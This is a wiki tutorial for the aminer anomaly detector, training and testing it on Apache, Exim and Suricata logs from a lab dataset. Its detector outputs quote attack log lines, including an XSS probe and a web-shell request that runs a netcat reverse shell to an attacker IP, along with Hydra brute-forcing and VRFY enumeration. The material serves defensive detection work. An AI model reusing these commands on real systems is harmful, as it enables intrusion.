Skip to content

aminer TryItOut

landauermax edited this page Aug 7, 2023 · 17 revisions

This wiki outlines the practical application of the aminer for log analysis and anomaly detection. The demonstration will involve setting up a simple log analysis pipeline containing detectors for unparsed log lines, new log event types, values, and value combinations. All described analyses will be carried out using several data sets contained in the AIT-LDSv1.1 (https://zenodo.org/record/4264796). A final version of the configuration that is incrementally built throughout this section is available at the end of this page. Note that this tutorial assumes that the aminer is correctly installed as outlined in Getting Started and that readers are already familiar with basic aminer configurations. Just as the Getting Started, this tutorial is carried out on Ubuntu Bionic:

alice@ubuntu1804:~$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 18.04.5 LTS
Release:	18.04
Codename:	bionic

Configuration of the aminer for AIT-LDSv1.1

In the following, a sample aminer configuration for analyzing Apache Access logs that are contained in the AIT-LDSv1.1 is explained. Subsequent sections will build upon this configuration, without showing and discussing identical parts multiple times. In addition, it is reasonable to split up input log files into training files that the aminer uses for learning, and test log files that contain the attacks and are used to demonstrate the detection capabilities of the aminer.

Try it out: Split Apache Access log data into training and test files

The Apache Access log file contains logs collected over six days. Since only the fifth day is affected by attacks, the first four days are used for training and the last two days are used for testing aminer's detection capabilities. To split the log file between the fourth and fifth day, use the commands:

cd /home/ubuntu/data/mail.cup.com/apache2
split -d -l 97577 mail.cup.com-access.log access_
head -n 4 access_00

This generates the training file access_00 containing 97.577 lines as well as the test file access_01 containing 50.977 lines. The first four lines of the training file are:

192.168.10.190 - - [29/Feb/2020:00:00:02 +0000] "GET /login.php HTTP/1.1" 200 2532 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
192.168.10.4 - - [29/Feb/2020:00:00:09 +0000] "POST /services/ajax.php/kronolith/listTopTags HTTP/1.1" 200 402 "http://mail.cup.com kronolith/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 HeadlessChrome/77.0.3865.90 Safari/537.36"
192.168.10.190 - - [29/Feb/2020:00:00:12 +0000] "POST /login.php HTTP/1.1" 302 601 "http://mail.cup.com/login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
192.168.10.190 - - [29/Feb/2020:00:00:13 +0000] "GET /services/portal/ HTTP/1.1" 200 7696 "http://mail.cup.com/login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"

As outlined in this wiki, log parsers are essential for adequately analyzing log data and running the aminer. The generation of these parsers is usually a rather time-consuming task, but may be supported by automatic tools (for more information on automatic generation of aminer parsers see https://github.com/ait-aecid/aecid-parsergenerator). All parsers required to process the log files contained in the AIT-LDSv1.1 come with the aminer default installation. The parser for the Apache Access logs is shown below. As visible, the parser involves various elements, including control elements for sequences, branches, and optional nodes of the model, as well as nodes for particular data types of log line tokens, such as fixed strings, variable strings, integers, time stamps, IP addresses, etc.

"""This module defines a generated parser model."""

from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement


def get_model():
    """Return a model to parse Apache Access logs from the AIT-LDS."""
    alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]"

    model = SequenceModelElement("model", [
        FirstMatchModelElement("client_ip", [
            SequenceModelElement("client_ip", [
                DelimitedDataModelElement("domain", b" "),
                FixedDataModelElement("sp0", b" "),
                IpAddressDataModelElement("client_ip")
                ]),
            SequenceModelElement("localhost", [
                DelimitedDataModelElement("domain", b" "),
                FixedDataModelElement("sp0", b" "),
                FixedDataModelElement("localhost", b"::1")
                ]),
            IpAddressDataModelElement("client_ip"),
            FixedDataModelElement("localhost", b"::1")
            ]),
        FixedDataModelElement("sp1", b" "),
        VariableByteDataModelElement("client_id", alphabet),
        FixedDataModelElement("sp2", b" "),
        VariableByteDataModelElement("user_id", alphabet),
        FixedDataModelElement("sp3", b" ["),
        DateTimeModelElement("time", b"%d/%b/%Y:%H:%M:%S%z"),
        FixedDataModelElement("sp4", b'] "'),
        FirstMatchModelElement("fm", [
            FixedDataModelElement("dash", b"-"),
            SequenceModelElement("request", [
                FixedWordlistDataModelElement("method", [
                    b"GET", b"POST", b"PUT", b"HEAD", b"DELETE", b"CONNECT", b"OPTIONS", b"TRACE", b"PATCH", b"REPORT", b"PROPFIND",
                    b"MKCOL"]),
                FixedDataModelElement("sp5", b" "),
                DelimitedDataModelElement("request", b" ", b"\\"),
                FixedDataModelElement("sp6", b" "),
                DelimitedDataModelElement("version", b'"'),
                ])
            ]),
        FixedDataModelElement("sp7", b'" '),
        DecimalIntegerValueModelElement("status_code"),
        FixedDataModelElement("sp8", b" "),
        DecimalIntegerValueModelElement("content_size"),
        OptionalMatchModelElement(
            "combined", SequenceModelElement("combined", [
                FixedDataModelElement("sp9", b' "'),
                DelimitedDataModelElement("referer", b'"', b"\\"),
                FixedDataModelElement("sp10", b'" "'),
                DelimitedDataModelElement("user_agent", b'"', b"\\"),
                FixedDataModelElement("sp11", b'"'),
                ]))
        ])

    return model

Try it out: Add aminer parser models

To make use of the parsers for the AIT-LDSv1.1, it is necessary to add them to the group of enabled parsers. To do this, just create a link for all available AIT-LDS parser models using the command:

sudo ln -s /etc/aminer/conf-available/ait-lds/* /etc/aminer/conf-enabled/

The configuration of the aminer makes use of parser models and places them at the beginning of a log processing pipeline. It also allows to select and configure analysis components and detectors, and define the output of the aminer, i.e., the interface to the analyst. Note that it is possible to run the aminer both on live data, i.e., logs that are generated on-the-fly, or forensically on historic data sets. This try-it-out only focuses on forensic analysis, since all logs in the AIT-LDSv1.1 were previously collected.

Try it out: Set up aminer configuration

First, copy the default YAML-configuration and open it using the commands:

sudo cp /etc/aminer/template_config.yml /etc/aminer/config.yml
sudo vim /etc/aminer/config.yml

The configuration is structured into several sections. First, it is necessary to define the learn mode that specifies whether we want to train the models or start detection. Since we are just getting started and have not trained the models so far, we set the learn mode to true as follows.

LearnMode: True

Next, we have to specify input log file. In the first part of this try-it-out section, only logs from the Apache Access log file will be considered. Set the path to the correct file of the extracted AIT-LDSv1.1, e.g.,

LogResourceList:
    - 'file:///home/ubuntu/data/mail.cup.com/apache2/access_00'

Next, the parser has to be added to the configuration. For this, import the Apache Access parsing model by referencing the name of the parser file implemented in python (ApacheAccessParsingModel) and then add a FirstMatchModelElement as a root node (indicated by id: 'START') so that it is easy to later add other parsing models parallel to the Apache Access parsing model.

Parser:
  - id: 'apacheAccessModel'
    type: ApacheAccessParsingModel
    name: 'apacheAccess'
    args: 'apacheAccess'

  - id: 'START'
    start: True
    type: FirstMatchModelElement
    name: 'parser'
    args: 
      - apacheAccessModel

Further configurations on the input are as follows. Note that multi_source input is set to True, in case that more input files are added later.

Input:
  multi_source: True
  timestamp_paths: 
    - '/parser/model/time'

To test the configuration and the parsing of log lines, it is advisable to add an analysis component that provides some debug output, before focusing on more complex detectors. One path that all log lines from the Apache Access log file pass through is used to count the number of log lines processed from that input source. Moreover, the output is generated every 10 seconds as specified by report_interval.

Analysis:
  - type: 'ParserCount'
    paths:
      - '/parser/model/status_code' # Apache Access 
    report_interval: 10

Finally, an output component is added to the pipeline that simply writes all messages created by the aminer to the console in JSON format.

EventHandlers:
  - id: 'stpe'
    json: True
    type: 'StreamPrinterEventHandler'

Try it out: Run aminer

Once the configuration is ready, it is easy to run the aminer from console. Note that running the aminer with sudo is necessary, because data has to be persisted in directories of the user aminer. Use the following command to start the aminer in foreground using the previously created configuration file.

sudo aminer --config /etc/aminer/config.yml

The aminer will immediately report some anomalies. The reason for this is that until that point no log lines have been observed, so each new type of log line is an anomaly. These anomalies are reported by the NewPathDetector that is always active and monitors all paths defined in the parser model. Due to the fact that the Apache Access parsing model is relatively simple, the aminer soon learns all possible paths and does not report any new anomalies.

Since no other detectors that raise anomalies were added to the pipeline, each line in the log file is parsed without undergoing any further analysis. Only the ParserCount component shows the current progress of parsing by printing out the total number of processed lines, e.g.,

{
  "StatusInfo": {
    "/parser/model/status_code": {
      "CurrentProcessedLines": 4,
      "TotalProcessedLines": 4
    }
  },
  "FromTime": 1596457890.205487,
  "ToTime": 1596457900.205512
}

Once all logs are processed, i.e., the parsed log line count does not increase anymore, terminate the aminer. Note that when restarting the aminer on the same input file, there are no more path anomalies reported. The reason for this is that the aminer persisted all learned paths, so that nothing has to be learned for future aminer runs on the same data. In case that it is desired to reset the persistency of the aminer, it is possible to manually delete the persistency, e.g., of the path detector, by:

sudo rm -r /var/lib/aminer/NewMatchPathDetector

Apache Access logs

The previous section ran the aminer on normal data. All data that is produced during normal operation should be covered by the parsing model, i.e., every possible event has to be modeled prior to parsing. Due to the fact that the structure of attack behavior manifestations and other anomalous logs is usually unknown, it is not always feasible to include every possible type of event in the parser. In most cases, it is even desired to have a rather restrictive model that is unable to parse logs with previously unknown syntax, because they likely stem from failures or other malicious activity and should be reported anyway. Unparsed logs are thus the most basic type of anomaly that are always reported, because the aminer cannot analyze a line with unknown contents and thus has to assume that it may be linked to malicious activity.

Try it out: Run aminer for unparsed log detection

To test the detection of unparsed logs, switch from the training file (access_00) to the test file (access_01) by adapting the path to the input file as follows:

LogResourceList:
  - 'file:///home/ubuntu/data/mail.cup.com/apache2/access_01'

Then, start the aminer as before. Several anomalies that are caused by attack manifestations are reported by the aminer. The reason for this is that one of the attacks carried out on the system involves a vulnerability scanner that randomly uses all kinds of unusual access techniques. One of the anomalies is shown here:

{
  "DebugLog": [
    "Starting match update on b'192.168.10.238 - - 
      [04/Mar/2020:19:18:46 +0000] \"<script>alert(1)</script> /
      HTTP/1.1\" 400 0 \"-\" \"-\"'",
      "Removed b'192.168.10.238', remaining 86 bytes",
      "Removed b' ', remaining 85 bytes",
      "Removed b'-', remaining 84 bytes",
      "Removed b' ', remaining 83 bytes",
      "Removed b'-', remaining 82 bytes",
      "Removed b' [', remaining 80 bytes",
      "Removed b'04/Mar/2020:19:18:46', remaining 60 bytes",
      "Removed b' +', remaining 58 bytes",
      "Removed b'0000', remaining 54 bytes",
      "Removed b'] \"', remaining 51 bytes",
      "Shortest unmatched data was b'<script>alert(1)</script> / 
        HTTP/1.1\" 400 0 \"-\" \"-\"'",
      ""
    ],
  "LogData": {
    "RawLogData": [
      "192.168.10.238 - - [04/Mar/2020:19:18:46 +0000] 
       	\"<script>alert(1)</script> / HTTP/1.1\" 400 0 
       	\"-\" \"-\""
    ],
    "Timestamps": [
      1596712108.24
    ],
    "LogLinesCount": 1
  },
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": null,
    "AnalysisComponentType": "VerboseUnparsedAtomHandler",
    "AnalysisComponentName": null,
    "Message": "Unparsed atom received",
    "PersistenceFileName": null
  }
}

As depicted in the JSON-formatted anomaly, the malicious log line (displayed in field RawLogData) contains the code injection attempt <script>alert(1)</script> at the position where the http access method (e.g., GET or POST) should be stated. Also note that the field DebugLog of the anomaly contains precise information on the progress of parsing and the first token that could not be parsed, which makes it easy to adapt or extend the parser model in case that the anomaly was a false positive and the event should be regarded as part of the normal behavior.

Value detectors are useful for monitoring values occurring at specific positions in log events, i.e., at specific parser paths. This is particularly useful for discrete values from a limited set. All values that occur in the training phase at that position of a specific type of log event are considered normal, and all new values encountered during detection are reported as anomalies. For the Apache Access logs, several parser paths come into question for such an analysis. In the following example, the status code of the logged accesses is selected, because it is reasonable to assume that all possible status codes that should occur during normal behavior are present in the training log file.

Try it out: Run aminer with value detector

First open the configuration and change the input file back to the training file access_00. Then, insert the value detector in the section containing the analysis components, i.e.,

Analysis:
  - type: 'NewMatchPathValueDetector'
    paths: ['/parser/model/status_code']
    persistence_id: 'accesslog_status'
    output_logline: False
    learn_mode: True

Note that the parser path specified in field paths points to the status code of the HTTP request, e.g., 200 in the 1., 2., and 4. line, or 302 in the 3. line of the Apache sample log. In addition, the learn_mode parameter is set to True, meaning that all newly observed values are reported as anomalies, but are immediately added to the set of known values that are considered normal. Setting the parameter output_logline to False avoids that detailed parsing information is added in the output, which makes it easier to screen through the anomalies. Start the aminer again to see one of these anomalies that is also shown below. As visible in the field AffectedLogAtomValues, the normal status code 200 was learned.

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "NewMatchPathValueDetector",
    "AnalysisComponentName": "NewMatchPathValueDetector2",
    "Message": "New value(s) detected",
    "PersistenceFileName": "accesslog_status",
    "TrainingMode": true,
    "AffectedLogAtomPaths": [
      "/parser/model/status_code"
    ],
    "AffectedLogAtomValues": [
      "200"
    ],
    "LogResource": "file:////tmp/access_00"
  },
  "LogData": {
    "RawLogData": [
      "192.168.10.190 - - [29/Feb/2020:00:00:02 +0000] \"GET /login.php HTTP/1.1\" 200 2532 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\""
    ],
    "Timestamps": [
      1582934402
    ],
    "DetectionTimestamp": 1639755001.06,
    "LogLinesCount": 1
  }
}

Once all log lines have been processed, terminate the aminer, which causes that all learned values are written to the persistency. View the persisted values using the command:

sudo vim /var/lib/aminer/NewMatchPathValueDetector/accesslog_status 

Ensure that only four different status codes (200, 304, 408, and 302) occurred during normal behavior. To use this knowledge for anomaly detection, open the configuration and replace the path to the training file (access_00) with the path to the test file (access_01) just as before. Also switch the learn_mode flag of the value detector from True to False, i.e.,

Analysis:
  - type: 'NewMatchPathValueDetector'
    paths: ['/parser/model/status_code']
    persistence_id: 'accesslog_status'
    output_logline: False
    learn_mode: False

This ensures that anomalous values encountered in the test file are raised as anomalies, but are not learned and therefore not added to the persistency, enabling to detect the anomalies again when more anomalies with the same anomalous value occur, or when restarting the aminer multiple times. Save the configuration and run the aminer to obtain a large number of anomalies. Most of them are caused by the vulnerability scanner that attempts to access several non-existing files that yield status code 400, e.g.,

"AffectedLogAtomValues": [
  "400"
],
"RawLogData": [
  "192.168.10.238 - - [04/Mar/2020:19:18:35 +0000] "GET 
    /perl/-e%20print%20Hello HTTP/1.1" 400 0 "-" "-""
]

Not only individual values are relevant for anomaly detection. Values at different positions in log events are often related to each other, and the occurrence of a single value may not be sufficient to differentiate normal from anomalous system behavior. Therefore, occurrences of combinations of values should be considered, which is the main purpose of the NewMatchPathValueComboDetector.

Try it out: Run aminer with combination detector

As before, switch the input file back to the training file access_00. Similar to the value detector, add the combination detector to the list of analysis components. Note that more than one path is required, otherwise the combination detector works identical to the value detector. In this case, the method of the logged access, e.g., GET or POST, and the user agent, are used for forming combinations. This allows to monitor which access methods were used by which user agents. Setting allow_missing_values to False ensures that each log line must contain parsed values for both the parser path to the method as well as the parser path to the user agent to be considered for learning and detection.

Analysis:
  - type: 'NewMatchPathValueComboDetector'
    paths:
      - '/parser/model/fm/request/method'
      - '/parser/model/combined/combined/user_agent'
    persistence_id: 'accesslog_request_agent'
    output_logline: False
    allow_missing_values: False
    learn_mode: True

To avoid a large number of anomalies and ease testing the functionalities of different detectors, comment out or remove the previously added value detector from the configuration. Note that in practice, it is usually beneficial to combine several detectors. Then, run the aminer on the training file and view the learned combinations using the command:

sudo vim /var/lib/aminer/NewMatchPathValueComboDetector/accesslog_request_agent 

The learned combinations look as follows. Note that the method is referenced by an index number, since all allowed values are defined as a list in the parsing model, i.e., 0=GET, 1=POST, and 6=OPTIONS.

[6, "bytes:Apache/2.4.25 (Debian) OpenSSL/1.0.2u (internal dummy connection)"], 
[0, "bytes:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"], 
[0, "bytes:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 HeadlessChrome/77.0.3865.90 Safari/537.36"], 
[1, "bytes:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"], 
[1, "bytes:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 HeadlessChrome/77.0.3865.90 Safari/537.36"]

Now, switch to the test input file access_01, set learn_mode of NewMatchPathValueComboDetector to False, and start the aminer. Again, a large number of anomalies is disclosed, e.g.,

"AffectedLogAtomValues": [
  "0",
  "curl/7.58.0"
],
  "RawLogData": [
    "192.168.10.238 - - [04/Mar/2020:19:32:50 +0000] \"GET 
      /static/evil.php?cmd=netcat%20-e%20/bin/
      bash%20192.168.10.238%209951 HTTP/1.1\" 200 131 
      \"-\" \"curl/7.58.0\""
]

Note that the GET request (indicated by index 0) monitored by a value detector would not have triggered an anomaly, but only the combined occurrence with a certain user agent is considered anomalous. The following alert on the other hand involves a status code that is not present in the training data (HEAD with index 3) as well as a new user agent.

"AffectedLogAtomValues": [
  "3",
  "python-requests/2.18.4"
],
"RawLogData": [
  "192.168.10.238 - - [04/Mar/2020:19:32:45 +0000] \"HEAD 
    /static/evil.php HTTP/1.1\" 200 167 \"-\" 
    \"python-requests/2.18.4\""
]

The value and combination detectors are relatively static, i.e., they do not consider temporal dependencies between the values they monitor. This is achieved by the event correlation detector, that assumes that the occurrence of a particular value at some position in a log line temporally correlates with the occurrence of another value at the same position, possibly with some delay. This principle works in an analogous manner for combinations of values as well as for types of events.

In more detail, the event correlation detector creates random hypotheses between pairs of value occurrences that are observed once, and then continues to test these hypotheses until eventually discarding the ones that appear unstable, i.e., have not been observed a sufficient amount of times, and transforming the ones that are stable into rules, i.e., correlations that are reported as anomalies when violated. Note that correlations are not always necessarily strict, but instead based on statistical binomial tests. This means that rules that were observed to occur with a certain probability, will be tested against that percentage, i.e., a certain number of failed tests may be allowed without reporting an anomaly.

Try it out: Run aminer with value range detector

Use the training file and train the aminer with the following analysis component:

  - type: 'ParserCount'
    paths:
      - '/parser/model/status_code' # Apache Access 
    report_interval: 10

  - type: 'ValueRangeDetector'
    paths:
      - '/parser/model/content_size'
    id_path_list:
      - '/parser/model/client_ip/client_ip'
    learn_mode: True

As we specify the client IP in the id_path_list parameter, the aminer will learn the minimum and maximum values of the content size (specified in the paths parameter) separately for each client IP. Check out the persistency to see what this means:

sudo cat /var/lib/aminer/ValueRangeDetector/Default
[{"tuple:('3232238270',)": 163, "tuple:('3232238084',)": 0, "tuple:()": 110, "tuple:('3232238318',)": 163, "tuple:('3232238280',)": 163}, {"tuple:('3232238270',)": 50928, "tuple:('3232238084',)": 50928, "tuple:()": 110, "tuple:('3232238318',)": 50928, "tuple:('3232238280',)": 50927}]

Note that IP addresses are represented in decimal format. For example, the address 3232238318 occurred with a minimum content size of 163 and a maximum size of 50928. Now switch from the training file to the detection file and run the aminer again with learn_mode set to False.

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 3,
    "AnalysisComponentType": "ValueRangeDetector",
    "AnalysisComponentName": "ValueRangeDetector3",
    "Message": "Value range anomaly detected",
    "PersistenceFileName": "Default",
    "TrainingMode": false,
    "AffectedLogAtomPaths": [
      "/parser/model/content_size"
    ],
    "AffectedLogAtomValues": [
      131
    ],
    "Range": [
      163,
      50928
    ],
    "IDpaths": [
      "/parser/model/client_ip/client_ip"
    ],
    "IDvalues": [
      "3232238318"
    ]
  },
  "LogData": {
    "RawLogData": [
      "192.168.10.238 - - [04/Mar/2020:19:32:50 +0000] \"GET /static/evil.php?cmd=netcat%20-e%20/bin/bash%20192.168.10.238%209951 HTTP/1.1\" 200 131 \"-\" \"curl/7.58.0\""
    ],
    "Timestamps": [
      1583350370
    ],
    "DetectionTimestamp": 1653044208.14,
    "LogLinesCount": 1
  }
}

As you see, there is an anomaly for an event related to command injection, in particular, the content size 131 retrieved by the command is smaller than the minimum observed content of 163. Note, for example, address 3232238084 has a minimum value of 0, so it is essential to split up the learned sizes by the IP addresses, otherwise the attack would not have triggered the alert since 131 > 0.

Try it out: Run aminer with event correlation detector

Use the training file access_00 for input and append the event correlation detector to the configuration of the aminer as follows:

Analysis:
  - type: 'EventCorrelationDetector'
    paths:
      - '/parser/model/fm/request/method'
      - '/parser/model/fm/request/request'
    max_observations: 200
    hypothesis_max_delta_time: 10.0
    hypotheses_eval_delta_time: 28800.0
    delta_time_to_discard_hypothesis: 28800.0
    p0: 0.95
    alpha: 0.05
    check_rules_flag: False
    persistence_id: 'accesslog_method_request'
    learn_mode: True

As before, learn_mode is set to True so that new hypotheses and rules are generated by the detector. The detector uses value combinations from the method, e.g., GET or POST, and the request, e.g., /login.php, for the generation of rules. This allows to monitor the sequences in which web pages are usually opened, e.g., the calendar web page is usually visited using a GET request, before a new calendar entry is saved using a POST request. Since check_rules_flag is set to False, the generated rules are not evaluated on the training set. The parameters max_observations, p0, and alpha specify sample size, initial probability, and significance of the statistical tests. Moreover, successful hypothesis and rule evaluations must occur within 10 seconds, as specified by hypothesis_max_delta_time, and are otherwise evaluated as failed. The parameters hypothesis_eval_delta_time and delta_time_to_discard_hypothesis are set to the relatively long time span of 8 hours (28.800 seconds) to make sure that hypotheses are not discarded during night time, where little or no user activity occurs.

Again, for the purpose of experimentation within this try-it-out section it is beneficial to comment out the value and combination detector to make analyzing and interpreting the results of the event correlation detector easier. Start the aminer and wait until all logs are processed. Then, terminate the aminer and open the persistency of the EventCorrelationDetector by:

sudo vim /var/lib/aminer/EventCorrelationDetector/accesslog_method_request 

The detector should have found several correlations, some of which are displayed in the following.

["string:forward", ["string:1", "string:/login.php"], ["string:0", "string:/services/portal/"], 190, 185],
["string:back", ["string:1", "string:/services/ajax.php/kronolith/listCalendars"], ["string:0", "string:/kronolith/"], 185, 185],
["string:back", ["string:0", "string:/nag/list.php"], ["string:1", "string:/nag/task/save.php"], 185, 185],
["string:forward", ["string:1", "string:/services/ajax.php/imp/dynamicInit"], ["string:1", "string:/services/ajax.php/imp/viewPort"], 200, 185]

The first rule is interpreted as follows. Every occurrence of the value combination POST and /login.php is expected to be followed (forward) by an occurrence of the value combination GET and /services/portal/ within 10 seconds. This makes sense, because every successful login is automatically redirected to the main portal of the web site. The correlation was observed 185 out of 190 times in the training file before transforming the hypothesis into a rule, which yields a probability of around 0.974% as the basis of the binomial test. The reason that 5 failed correlations occurred, may be caused by user login attempts that used incorrect user names or passwords.

Other than the first rule, the second rule is a back rule, meaning that the correlation points to the past rather than the future. In particular, every occurrence of the value combination POST and /services/ajax.php/kronolith/listCalendars must have been preceded by an occurrence of the value combination GET and /kronolith/ in the previous 10 seconds. Also note that this rule was observed 185 out of 185 times in the learning phase, meaning that a single failure to detect this correlation will trigger an anomaly in the detection phase.

To test the event correlation detection, switch the input file path to the access_01 file, set learn_mode of EventCorrelationDetector to False so that no new hypotheses are generated, set check_rules_flag to True to use the persisted rules, and set alpha to 0.001 to increase the margin of errors for rule evaluations so that only strong violations are reported. In practice, it is common to set both learn_mode and check_rules_flag to True in order to learn and test rules in parallel. When running the aminer again, several false positives are reported, because of random fluctuations of the user behavior. However, among them are anomalies that relate to the Hydra attack, which attempts to brute force log into an account. Due to the fact that the detector learned in the training phase that accesses to /login.php with a POST method are usually followed by accesses to the main web page /services/portal/, the increase of unsuccessful attempts was detected as a violation of this correlation. As visible in the RuleInfo field of the following JSON-formatted anomaly, after observing accesses to /login.php for 14 times without a single access to /services/portal/, all allowed failures were consumed and thus the anomaly was reported.

{
  "RuleInfo": {
    "Rule": "('1', '/login.php')->('0', '/services/portal/')",
    "Expected": "187/200",
    "Observed": "0/14"
  },
  "LogData": {
    "RawLogData": [
      "192.168.10.238 - - [04/Mar/2020:19:26:22 +0000] \"GET /login.php 
        HTTP/1.0\" 200 6335 \"-\" \"Mozilla/5.0 (Hydra)\""
    ],
    "Timestamps": [
      1583349982
    ],
    "LogLinesCount": 2
  },
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "EventCorrelationDetector",
    "AnalysisComponentName": "EventCorrelationDetector2",
    "Message": "Correlation rule violated! Event b'192.168.10.4 - - 
      [04/Mar/2020:19:25:53 +0000] \"GET /services/portal/ HTTP/1.1\" 
      200 8527 \"http://mail.cup.com/mnemo/list.php\" \"Mozilla/5.0 
      (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\"' 
      is missing, but should follow event b'192.168.10.238 - - 
      [04/Mar/2020:19:26:04 +0000] \"POST /login.php HTTP/1.0\" 200 6360 
      \"-\" \"Mozilla/5.0 (Hydra)\"'",
    "PersistenceFileName": "accesslog_method_request"
  }
}

In this try-it-out, the event correlation detector is set to analyze the correlations between values at particular paths. However, the same detector can be used to analyze the correlations of event type occurrences, i.e., paths that occur for each log event. Due to the fact that the Apache Access logs only contain one type of event, this functionality is not demonstrated. To switch from value to event correlation, just remove the paths parameter. The aminer will then consider all occurring log event types for learning rules and detecting rule violations.

Exim Mainlog file

The path detector was already mentioned before, but was not used for the detection of attacks. Therefore, the Exim Mainlog file is used to demonstrate a practical application of that detector. Remember that the path detector is always active and monitors the observed log event types through the paths of the parser model. All log lines that are covered by the parser model, but are using paths that never occur in the training phase, are disclosed by the path detector. For the following example, the previously configured analysis components do not necessarily have to be removed, in particular, when the Apache Access logs are commented out.

Try it out: Split Exim Mainlog file into training and test files

Similar to the Apache Access log file, it is necessary to split the Exim Mainlog file into a training and test file using the commands:

cd /home/ubuntu/data/mail.cup.com/exim4
split -d -l 4735 mainlog mainlog_

The training file is called mainlog_00 and the test file that contains 2.608 lines is called mainlog_01.

Try it out: Run aminer with path detector

While the aminer is capable of handling multiple input files at once, it may be difficult to experiment with a detector as long as anomalies from other log files are triggered. Therefore, it is recommended to remove or comment out the path to the Apache Access log and replace it with the path to the Exim Mainlog training file, i.e.,

LogResourceList:
  - 'file:///home/ubuntu/data/mail.cup.com/exim4/mainlog_00'

Due to the fact that the syntax of the lines in this log file is different to the Apache Access logs, it is necessary to append an appropriate parsing model to the configuration. In particular, add the EximParsingModel and append it to the root node as follows:

Parser:
  - id: 'apacheAccessModel'
    type: ApacheAccessParsingModel
    name: 'apacheAccess'
    args: 'apacheAccess'

  - id: 'eximModel'
    type: EximParsingModel
    name: 'exim'
    args: 'exim'

  - id: 'START'
    start: True
    type: FirstMatchModelElement
    name: 'parser'
    args:
      - apacheAccessModel
      - eximModel

Note that the previously defined apacheAccessModel is still part of the parser and should therefore not be commented out. In order to see the amount of log lines parsed from the Exim Mainlog files, add the following parser path to the parser count analyis component.

- type: 'ParserCount'
  paths: 
    - '/parser/model/sp' # Exim

Start the aminer and wait until all lines are processed. Then, switch to the mainlog_01 file for testing and set the learning mode flag of the path detector to False by writing the following expression to the top of the configuration file.

LearnMode: False

Run the aminer on the test file to obtain all anomalies. One of them is displayed in the following.

"AffectedLogAtomPaths": [
  "/parser/model/fm/vrfy_failed",
  "/parser/model/fm/vrfy_failed/vrfy_failed_str",
  "/parser/model/fm/vrfy_failed/mail",
  "/parser/model/fm/vrfy_failed/h_str",
  "/parser/model/fm/vrfy_failed/h",
  "/parser/model/fm/vrfy_failed/sp1",
  "/parser/model/fm/vrfy_failed/ip",
  "/parser/model/fm/vrfy_failed/sp2"
],
"RawLogData": [
  "2020-03-04 19:21:48 VRFY failed for boyce@cup.com H=(x) 
    [192.168.10.238]"
]

As visible, several new paths have been observed by the detector in the raw log line stated above. The reason for this is that this line is present in the parser model, but never occurred in the training file. This is because it is a legitimate line, but in this context used for brute force guessing user names using the VRFY command (The VRFY command of the SMTP protocol is explained in detail in the RFC5321 accessible at https://tools.ietf.org/html/rfc5321). Accordingly, this anomaly is correctly triggered.

Suricata event logs

Suricata event logs contain information on network communication. The logs mainly consist of netflows, but also contain statistics and alerts detected by suricata during log generation. The logs are available in json format - however, there is exactly one json object per line, it is possible to parse it just as any other log data. Note that multi-line json logs are more easily parsed using the JsonModelElement.

Alerts that occur in logs are not necessarily linked to attacks. In particular, misconfigurations or otherwise unusual user behavior may be reported as anomalies, but considered as perfectly normal by administrators. Accordingly, alerts can be processed by the aminer just as any other log line - through parsing and subsequent analysis of values. In the following, the number of alerts occurring within a certain time window is considered as an indicator for strange system behavior. As mentioned before, a certain "baseline" of occurring alerts can be considered normal if it occurs consistently over time. However, a sudden increase of alerts is clearly a sign that something changed in the system, and should thus be reported by the aminer.

Try it out: Split suricata event logs into training and test files

Use the following command to split the suricata event logs into two files. This generates the training file eve_00 and the test file eve_01 with 306764 lines.

cd /home/ubuntu/data/mail.cup.com/suricata
split -d -l 625925 eve.json eve_

Try it out: Run aminer on suricata event logs with the frequency detector

Make sure that path to the input file points to eve_00 that was just created before. To parse suricata event logs, a predefined parser is provided together with the aminer. To load the SuricataEventParsingModel, add the following code to the parser section of the config.yml.

Parser:
  - id: 'suricataEventModel'
    type: SuricataEventParsingModel
    name: 'suricataEvent'
    args: 'suricataEvent'

  - id: 'startModel'
    start: True
    type: SequenceModelElement
    name: 'parser'
    args: 
      - suricataEventModel

